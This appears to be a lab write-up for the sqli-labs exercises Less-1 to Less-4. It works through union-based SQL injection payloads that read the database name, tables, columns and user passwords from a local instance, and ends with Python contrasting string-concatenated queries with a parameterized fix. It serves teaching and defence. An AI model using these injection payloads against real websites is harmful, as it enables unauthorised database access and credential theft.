Basic Challenge
Less-1
Identifying the injection point:
http://127.0.0.1/sqli-lab/Less-1/?id=1'
Appending a ' reveals the injection point; the error shows that the value is already enclosed in single quotes:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
All that remains is to comment out the rest of the statement, using either # or --+.
Determining the number of columns:
http://127.0.0.1/sqli-lab/Less-1/?id=1' order by 3--+
order by 4 errors and order by 3 does not, so the query has 3 columns.
Finding the database:
http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,2,3--+
Columns 2 and 3 are echoed to the page.
http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,database(),version()--+
http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,2,group_concat(database(),version())--+
The database is security; the database version is 5.5.53.
Finding the tables:
http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
Tables: emails, referers, uagents, users.
Finding the columns:
http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
Columns: id, username, password.
Reading the data:
http://127.0.0.1/sqli-lab/Less-1/?id=-1' union select 1,2,password from users--+
password: Dumb.
Less-2
Finding the injection point:
http://127.0.0.1/sqli-lab/Less-2/?id=1'
An error appears, but the single quote we entered is not what closes the statement: the value was never quoted, so the added ' is simply one quote too many:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
So just drop the ' from the Less-1 payloads.
payload:
http://127.0.0.1/sqli-lab/Less-2/?id=1--+
Everything else is the same as Less-1.
Less-3
Finding the injection point:
http://127.0.0.1/sqli-lab/Less-3/?id=1'
The error message shows a parenthesis as well, so the statement has to be closed with a quote followed by a parenthesis:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
payload:
http://127.0.0.1/sqli-lab/Less-3/?id=1')--+
Everything else is the same as Less-1.
Less-4
Finding the injection point:
http://127.0.0.1/sqli-lab/Less-4/?id=1'
Adding a single quote produces no error.
http://127.0.0.1/sqli-lab/Less-4/?id=1"
Adding a double quote does produce an error, and the message shows the statement must be closed with a double quote followed by a parenthesis:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
payload:
http://127.0.0.1/sqli-lab/Less-4/?id=1")--+
Everything else is the same as Less-1.
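The four levels differ only in how the id value is wrapped (', nothing, ') and ")), and the fragment MySQL quotes back in each error is exactly the text the concatenation produced. The following added example (my own code, not part of the write-up or of sqli-labs) makes that visible for all four levels as plain strings, and beside it shows the fix that removes the whole class of bug: integer validation plus a bound parameter. The query templates are my assumption about the lab's SQL, reconstructed from the error messages above; the users table is a constructed sqlite3 stand-in, and only the id=1 row mirrors the write-up.

```python
import sqlite3
from typing import Optional, Tuple

# Constructed stand-in for the lab's security.users table (id, username, password).
# Only the id=1 row mirrors the write-up (password Dumb); the second row is made up.
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "sample_user", "sample_pw")]

# Assumed shape of the lab's concatenated query per level, reconstructed from the
# quoting contexts the error messages reveal. String only, never executed: it exists
# to show what the server sees when a quote is appended to the parameter.
LAB_TEMPLATES = {
    1: "SELECT * FROM users WHERE id='{id}' LIMIT 0,1",
    2: "SELECT * FROM users WHERE id={id} LIMIT 0,1",
    3: "SELECT * FROM users WHERE id=('{id}') LIMIT 0,1",
    4: 'SELECT * FROM users WHERE id=("{id}") LIMIT 0,1',
}


def build_lab_query(level: int, raw_id: str) -> str:
    """Reproduce the vulnerable concatenation as text. Level 1 with raw_id "1'" gives
    ...id='1'' LIMIT 0,1, the very fragment MySQL echoes in its error message."""
    return LAB_TEMPLATES[level].format(id=raw_id)


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def parse_id(raw: str) -> Optional[int]:
    """Allow-list validation: id must be a plain decimal integer, so quotes,
    parentheses and comment markers are rejected before any SQL is built."""
    return int(raw) if raw.isdigit() else None


def lookup_user(conn: sqlite3.Connection, raw_id: str) -> Optional[Tuple[int, str]]:
    """Hardened counterpart of the lab query: the value travels as a bound parameter,
    so it can never alter the statement's structure, whatever quoting the statement uses."""
    uid = parse_id(raw_id)
    if uid is None:
        return None
    return conn.execute("SELECT id, username FROM users WHERE id = ? LIMIT 1", (uid,)).fetchone()


if __name__ == "__main__":
    db = open_db()
    for probe in ("1", "1'", "-1' union select 1,2,3--+"):
        print(repr(probe), "->", build_lab_query(1, probe), "|", lookup_user(db, probe))
```

Running the block prints, for each probe, the string the vulnerable concatenation would send to MySQL next to the result of the hardened lookup, which returns a row only for a well-formed integer id.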